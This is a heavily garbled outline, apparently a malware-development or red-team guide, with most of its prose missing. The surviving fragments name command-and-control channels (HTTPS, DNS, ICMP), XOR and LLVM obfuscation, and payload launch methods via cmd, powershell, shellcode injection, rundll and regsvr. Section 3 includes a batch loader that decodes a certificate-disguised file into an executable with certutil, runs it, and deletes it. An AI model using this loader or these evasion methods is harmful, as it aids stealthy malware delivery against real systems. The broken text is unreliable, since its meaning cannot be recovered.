  

1.    
-      . : HTTPS, DNS, ICMP
-   
-   (      - ,     )
-          ()
-   ,      
-    .  ,  json/xml/ -    ,    
-  .   


2.  (stateless-)
-        , ID,   ,   , 
     "" -    ,     ,
     ,       .
-      -   ,     .
:     ,      ,      .
 ,   -   ,   ,       .


3. 
-    
-     .
,    ,    :

 @echo off
 REM    ""
 certutil -decode file.crt file.exe
 REM  
 file.exe
 REM      
 ping -n 300 127.0.0.1 > NUL
 REM  , ..       
 del /f /y file.exe

          ,     .
     ,    -      ,    .
-       

4.  
      .
-     ,   
-    -,    - XOR   XOR 1 .
-     ,        
-   
-   ,   ,  ,      
-  ,     (   )
-   LLVM-  

5. 
-   ,  .     
-  cmd- ()
-  powershell- ()
-   shell- https://github.com/DimopoulosElias/SimpleShellcodeInjector/blob/master/SimpleShellcodeInjector.c
-  .exe- ()
-  .dll (rundll, regsvr) 

6.  
-       ,        

7. 
-    

